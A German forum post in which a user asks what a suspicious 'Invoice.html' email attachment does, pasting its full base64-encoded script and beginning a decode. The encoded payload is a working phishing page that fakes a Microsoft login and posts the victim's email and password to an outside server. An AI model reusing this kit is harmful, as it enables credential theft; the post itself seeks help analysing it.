This forum uses cookies
This forum makes use of cookies to store your login information if you are registered, and your last visit if you are not. Cookies are small text documents stored on your computer; the cookies set by this forum can only be used on this website and pose no security risk. Cookies on this forum also track the specific topics you have read and when you last read them. Please confirm whether you accept or reject these cookies being set.

A cookie will be stored in your browser regardless of choice to prevent you being asked this question again. You will be able to change your cookie settings at any time using the link in the footer.
Javascript-forumEntwicklungJavascript v
Was machen diese JavaScripts?

Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Ansichts-Optionen
Was machen diese JavaScripts?
NeuHier
Gast
 
#1
19.10.2022, 10:00 - Wörter:
Servus!

Brauche Eure Hilfe!

Heute Nacht kriegt mein Chef von einem Lieferant ein Mail mit "Invoice.html"-Anhang. Nichts Böses ahnend, versucht er den Anhang aufzumachen. Merkt aber sofort, das hier was faul ist.
Das hier ist Inhalt von "Invoice.html"
<script>
    var url_string = "firmenmail@adresse.com";
    var data = atob("PCFET0NUWVBFIGh0bWw+CjxodG1sIGRpcj0ibHRyIiBjbGFzcz0iIiBsYW5nPSJlbiI+CiAgICA8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KICAgIDx0aXRsZT5FeGNlbCB3b3Jrc2hlZXQ8L3RpdGxlPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTIuMCwgdXNlci1zY2FsYWJsZT15ZXMiPgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9mYXZpY29uX2FfZXVwYXlmZ2docWlhaTdrOXNvbDZsZzIuaWNvIj4gICAgCiAgICA8bGluayBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2NvcnNAMi44LjUvbGliL2luZGV4Lm1pbi5qcyI+CiAgICA8bGluayBkYXRhLWxvYWRlcj0iY2RuIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9jZG5idW5kbGVzL2NvbnZlcmdlZC52Mi5sb2dpbi5taW5feml5dGY4ZHp0OWVnMXM2LW9oaGxlZzIuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8L2hlYWQ+CjxzY3JpcHQ+CiAgICAvLyBwcmV2ZW50IGN0cmwgKyBzCiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGFzeW5jKGUpID0+IHsKICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIChlLndoaWNoID09IDgzKSkgewogICAgICAgICAgICBlLnByZXZlbnREZWZhdWx0KCk7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsgfQogICAgfSk7CiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBldmVudCA9PiBldmVudC5wcmV2ZW50RGVmYXVsdCgpKTsKICAgIGRvY3VtZW50Lm9ua2V5ZG93biA9IGZ1bmN0aW9uIChlKSB7CiAgICAgICAgaWYgKGV2ZW50LmtleUNvZGUgPT0gMTIzKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0UnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUuc2hpZnRLZXkgJiYgZS5rZXlDb2RlID09ICdJJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLnNoaWZ0S2V5ICYmIGUua2V5Q29kZSA9PSAnSicuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdVJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ1MnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnSCcuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdBJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0YnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnRScuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgfQogICAgd2luZG93Lm9ua2V5ZG93biA9IChlKSA9PiB7CiAgICAgICAgcmV0dXJuICEoZS5jdHJsS2V5ICYmCiAgICAgICAgICAgIChlLmtleUNvZGUgPT09IDY3IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg2IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg1IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDExNykpOwogICAgfTsgICAgCjwvc2NyaXB0Pgo8Ym9keSBjbGFzcz0iY2IiIHN0eWxlPSJkaXNwbGF5OiBibG9jazsiPgo8Zm9ybSBuYW1lPSJmMSIgaWQ9ImkwMjgxIiBtZXRob2Q9InBvc3QiIGF1dG9jb21wbGV0ZT0ib2ZmIj4KICAgIDxkaXYgY2xhc3M9ImxvZ2luLXBhZ2luYXRlZC1wYWdlIj4KICAgICAgICA8ZGl2IGlkPSJsaWdodGJveFRlbXBsYXRlQ29udGFpbmVyIj4KPGRpdiBpZD0ibGlnaHRib3hCYWNrZ3JvdW5kQ29udGFpbmVyIj4KICAgIDxkaXYgY2xhc3M9ImJhY2tncm91bmQtaW1hZ2UtaG9sZGVyIiByb2xlPSJwcmVzZW50YXRpb24iPgogICAgPGRpdiBjbGFzcz0iYmFja2dyb3VuZC1pbWFnZSBleHQtYmFja2dyb3VuZC1pbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybCgmcXVvdDtodHRwczovL2d5YXpvLmNvbS9lMjFlY2NmOWUzMDdlMzYwZTNhODBjZTZiYmM3NGFmOC5wZ247KTsiPjwvZGl2Pgo8L2Rpdj48L2Rpdj4KICAgIDxkaXYgY2xhc3M9Im91dGVyIiBpZD0iYmdJbWdDZW50ZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InRlbXBsYXRlLXNlY3Rpb24gbWFpbi1zZWN0aW9uIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWlkZGxlIGV4dC1taWRkbGUiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZnVsbC1oZWlnaHQiPgogICAgPGRpdiBjbGFzcz0iZmxleC1jb2x1bW4iPgogICAgICAgIDxkaXYgY2xhc3M9Indpbi1zY3JvbGwiPgogICAgICAgICAgICA8ZGl2IGlkPSJsaWdodGJveCIgY2xhc3M9InNpZ24taW4tYm94IGV4dC1zaWduLWluLWJveCBmYWRlLWluLWxpZ2h0Ym94Ij4KICAgICAgICAgICAgPGRpdj48aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS83YWU3NzNmZjYxZTJjOGE4OGJkYTU1MzBjM2IyYWExMy5wbmciIHN0eWxlPSJ3aWR0aDo5MHB4OyBoZWlnaHQ6NzVweDsiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IHJvbGU9Im1haW4iPgogICAgICAgIDxkaXYgaWQ9InBzdGIiIGNsYXNzPSJwYWdpbmF0aW9uLXZpZXcgYW5pbWF0ZSBoYXMtaWRlbnRpdHktYmFubmVyIHNsaWRlLWluLW5leHQiPgogICAgICAgIDxkaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImlkZW50aXR5QmFubmVyIj4KICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0iYnV0dG9uIiBjbGFzcz0iYmFja0J1dHRvbiIgaWQ9ImlkQnRuX0JhY2siPiA8aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0XzdjYzA5NmRhNmFhMmRiYTNmODFmY2MxYzgyNjIxNTdjLnBuZyIgc3Znc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI+IDwvYnV0dG9uPgogICAgICAgICAgICAgICAgPGRpdiBpZD0ic2hvdy1lbWFpbCIgY2xhc3M9ImlkZW50aXR5Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0aXRsZSBleHQtdGl0bGUiPgogICAgICAgIDxkaXYgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI+RW50ZXIgcGFzc3dvcmQ8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iZXJyb3JwdyIgc3R5bGU9ImNvbG9yOiByZWQ7IG1hcmdpbjogMTVweDsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyBtYXJnaW4tYm90dG9tOiAwcHg7Ij48L2Rpdj4KICAgIDxkaXYgaWQ9ImltcG9ydGFudDEiIHN0eWxlPSJjb2xvcjogYmxhY2s7Zm9udC1zaXplOiAxM3B4OyI+CiAgICAgICAgQmVjYXVzZSB5b3UncmUgYWNjZXNzaW5nIHNlbnNpdGl2ZSBpbmZvLCB5b3UgbmVlZCB0byB2ZXJpZnkgeW91ciBwYXNzd29yZCB0byB2aWV3IGV4Y2VsIHdvcmtzaGVldHMKICAgICA8L2Rpdj4KICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwbGFjZWhvbGRlckNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0icGFzc3dkIiB0eXBlPSJwYXNzd29yZCIgaWQ9ImkwMTE4IiBhdXRvY29tcGxldGU9Im9mZiIgY2xhc3M9ImZvcm0tY29udHJvbCBpbnB1dCBleHQtaW5wdXQgdGV4dC1ib3ggZXh0LXRleHQtYm94IiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIHJlcXVpcmVkIC8+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2PgogICAgPGRpdiBjbGFzcz0icG9zaXRpb24tYnV0dG9ucyI+CiAgICAgICAgPGRpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC0yNCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0idGV4dC0xMyI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPk5vdGU6IE9ubHkgcmVjaXBpZW50J3MgZW1haWwgY2FuIGFjY2VzcyBzaGFyZWQgZmlsZXM8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8YSBpZD0iaTE2NjgiIGhyZWY9IiMiPjwvYT4KICAgICAgICAgICAgPC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAKICAgICAgICA8ZGl2IGNsYXNzPSJ3aW4tYnV0dG9uLXBpbi1ib3R0b20iPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICAgICAgPGRpdj48ZGl2IGNsYXNzPSJjb2wteHMtMjQgbm8tcGFkZGluZy1sZWZ0LXJpZ2h0IGJ1dHRvbi1jb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGlkPSJCdXR0b245IiBjbGFzcz0id2luLWJ1dHRvbiBidXR0b25fcHJpbWFyeSBidXR0b24gZXh0LWJ1dHRvbiBwcmltYXJ5IGV4dC1wcmltYXJ5IiB2YWx1ZT0iU2lnbmluIj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0icGxhdGUgZm9vdGVyIGV4dC1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj48L2Rpdj4KICAgIDxkaXYgaWQ9ImZvb3RlciIgcm9sZT0iY29udGVudGluZm8iIGNsYXNzPSJmb290ZXIgZXh0LWZvb3RlciI+CiAgICAgICAgPGRpdj4KPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4KICAgICAgICA8YSBpZD0iZnRyVGVybXMiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5UZXJtcyBvZiB1c2U8L2E+CiAgICAgICAgPGEgaWQ9ImZ0clByaXZhY3kiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E+CiAgICA8YSBpZD0ibW9yZU9wdGlvbnMiIGhyZWY9IiMiIGFyaWEtbGFiZWw9IkNsaWNrIGhlcmUgZm9yIHRyb3VibGVzaG9vdGluZyBpbmZvcm1hdGlvbiIgY2xhc3M9ImZvb3Rlci1jb250ZW50IGV4dC1mb290ZXItY29udGVudCBmb290ZXItaXRlbSBleHQtZm9vdGVyLWl0ZW0gZGVidWctaXRlbSBleHQtZGVidWctaXRlbSI+Li4uPC9hPgo8L2Rpdj48L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KPC9kaXY+PC9kaXY+CjwvZm9ybT4KPHNjcmlwdD4KICAgIHZhciBjb3VudCA9IDA7CiAgICBmdW5jdGlvbiBzZXRfYnJhbmQoZW1haWwpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIGRhdGE6IHsgdXNlcm5hbWU6IGVtYWlsIH0sCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChyZXNwb25zZSkgewogICAgICAgICAgICAgICAgbGV0IHJlcyA9IEpTT04ucGFyc2UocmVzcG9uc2UpCiAgICAgICAgICAgICAgICBsZXQgbG9nbyA9IHJlc1sicmVzIl1bIkJhbm5lckxvZ28iXSwgYmFja2dyb3VuZCA9IHJlc1sicmVzIl1bIklsbHVzdHJhdGlvbiJdLCBEYXJrVGlsZSA9IHJlc1sicmVzIl1bIlRpbGVEYXJrTG9nbyJdCiAgICAgICAgICAgICAgICBsZXQgVGlsZUxvZ28gPSByZXNbInJlcyJdWyJUaWxlTG9nbyJdLCBCb2lsZXJQbGF0ZVRleHQgPSByZXNbInJlcyJdWyJCb2lsZXJQbGF0ZVRleHQiXQogICAgICAgICAgICAgICAgaWYgKGxvZ28pIHsKICAgICAgICAgICAgICAgICAgICAkKCcubG9nbycpLmF0dHIoJ3NyYycsIGxvZ28pOwoJCQkgICAgfQogICAgICAgICAgICAgICAgaWYgKEJvaWxlclBsYXRlVGV4dCkgewogICAgICAgICAgICAgICAgICAgIGNvbnNvbGUubG9nKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuYXBwZW5kKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuY3NzKHsidGV4dC1hbGlnbiI6ICJjZW50ZXIifSkKICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmIChiYWNrZ3JvdW5kKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIGJhY2tncm91bmQgKyAnKScsICItd2Via2l0LWZpbHRlciI6ICJicmlnaHRuZXNzKDIwJSkiLCAiZmlsdGVyIjogImJyaWdodG5lc3MoNDclKSIgfSk7CiAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKERhcmtUaWxlKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIERhcmtUaWxlICsgJyknLCAiLXdlYmtpdC1maWx0ZXIiOiAiYnJpZ2h0bmVzcygyMCUpIiwgImZpbHRlciI6ICJicmlnaHRuZXNzKDQ3JSkiIH0pOwogICAgICAgICAgICAgICAgfSBlbHNlIGlmIChUaWxlTG9nbykgewogICAgICAgICAgICAgICAgICAgICQoJy5iYWNrZ3JvdW5kLWltYWdlJykuY3NzKHsgJ2JhY2tncm91bmQtaW1hZ2UnOiAndXJsKCcgKyBUaWxlTG9nbyArICcpJywgIi13ZWJraXQtZmlsdGVyIjogImJyaWdodG5lc3MoMjAlKSIsICJmaWx0ZXIiOiAiYnJpZ2h0bmVzcyg0NyUpIiB9KTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfQoKICAgIGZ1bmN0aW9uIHNlbmRfcmVzdWx0KHVzZXIsIHBhc3MpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICBkYXRhOiB7CiAgICAgICAgICAgICAgICAiZW1haWwiOiB1c2VyLAogICAgICAgICAgICAgICAgInBhc3N3b3JkIjogcGFzcwogICAgICAgICAgICB9LAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZyhkYXRhKTsKICAgICAgICAgICAgfSwKICAgICAgICAgICAgZXJyb3I6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZygnQWpheCBlcnJvcicpOwogICAgICAgICAgICB9CgkJfSk7ICAgICAgICAKICAgIH0KCiAgICAKICAgIGRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBhc3luYygpID0+IHsKICAgICAgICBpZih1cmxfc3RyaW5nKXsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInNob3ctZW1haWwiKS5pbm5lckhUTUwgPSB1cmxfc3RyaW5nOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAxMTgiKS5mb2N1cygpOwogICAgICAgICAgICBzZXRfYnJhbmQodXJsX3N0cmluZyk7CiAgICAgICAgfQoKICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQnV0dG9uOSIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgZSA9PiB7CiAgICAgICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0ID8gZXZlbnQucHJldmVudERlZmF1bHQoKSA6IGV2ZW50LnJldHVyblZhbHVlID0gZmFsc2U7CgogICAgICAgICAgICB2YXIgcHN3ZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDExOCIpLnZhbHVlOwogICAgICAgICAgICBpZihwc3dkLmxlbmd0aCA8IDUpewogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5PSJub25lIjsKICAgICAgICAgICAgICAgIHNldFRpbWVvdXQoKCkgPT4ge2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDI4MSIpLnJlc2V0KCk7IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdlcnJvcnB3JykuaW5uZXJIVE1MID0gIllvdXIgYWNjb3VudCBwYXNzd29yZCBpcyB0b28gc2hvcnQuIn0sIDE1MDApOwogICAgICAgICAgICB9IGVsc2UgaWYgKHBzd2QubGVuZ3RoID4gNSAmJiBjb3VudCA8PSAwKSB7CiAgICAgICAgICAgICAgICBzZW5kX3Jlc3VsdCh1cmxfc3RyaW5nLCBwc3dkKTsKICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbXBvcnRhbnQxIikuc3R5bGUuZGlzcGxheT0ibm9uZSI7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHtjb3VudCsrOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAyODEiKS5yZXNldCgpOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZXJyb3JwdycpLmlubmVySFRNTCA9IGBZb3VyIHBhc3N3b3JkIGlzIGluY29ycmVjdC4gUGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZCBmb3IgeW91ciBhYm92ZSBlbWFpbCB0byBhY2Nlc3MgRXhjZWwgd29ya3NoZWV0LCA8YSBocmVmPSIjIj48L2E+YH0sIDIwMDApCiAgICAgICAgICAgIH0gZWxzZSBpZiAoY291bnQgPCAyKXsKICAgICAgICAgICAgICAgIHNlbmRfcmVzdWx0KHVybF9zdHJpbmcsIHBzd2QpOwogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwogICAgICAgICAgICAgICAgc2V0VGltZW91dCgoKSA9PiB7Y291bnQrKzsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImkwMjgxIikucmVzZXQoKTsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2Vycm9ycHcnKS5pbm5lckhUTUwgPSBgWW91ciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuIFBsZWFzZSBlbnRlciB0aGUgcGFzc3dvcmQgZm9yIHlvdXIgYWJvdmUgZW1haWwgdG8gYWNjZXNzIEV4Y2VsIHdvcmtzaGVldCwgPGEgaHJlZj0iIyI+PC9hPmB9LCAyMDAwKQogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgc2VuZF9yZXN1bHQodXJsX3N0cmluZywgcHN3ZCk7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHt3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9vdXRsb29rLm9mZmljZTM2NS5jb20vRW5jcnlwdGlvbi9FcnJvclBhZ2UuYXNweD9zcmM9MyZjb2RlPTExJmJlPVNONlBSMDRNQjQwMTQmZmU9Sk5BUDI3NUNBMDA0MC5aQUZQMjc1LlBST0QuT1VUTE9PZ0suQ09NJmxvYz1lbi1VUyZpdGVtSUQ9RTRFX01fZTlkZjE1NGEtZTRiOC00NDg2LThhZWMtN2FjY2VlYjkzZmVlIil9KTsKICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfSk7Cjwvc2NyaXB0Pgo8L2Rpdj48L2JvZHk+PC9odG1sPg==");
    document.write(data)
</script>

Konnte soweit den Inhalt dekodieren...
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Excel worksheet</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
    // prevent ctrl + s
    window.addEventListener('keydown', async(e) => {
        if (e.ctrlKey && (e.which == 83)) {
            e.preventDefault();
            return false; }
    });
    window.addEventListener('contextmenu', event => event.preventDefault());
    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
    }
    window.onkeydown = (e) => {
        return !(e.ctrlKey &&
            (e.keyCode === 67 ||
                e.keyCode === 86 ||
                e.keyCode === 85 ||
                e.keyCode === 117));
    };
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
    <div class="outer" id="bgImgCenter">
        <div class="template-section main-section">
            <div class="middle ext-middle">
                <div class="full-height">
    <div class="flex-column">
        <div class="win-scroll">
            <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
            <div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
            <div role="main">
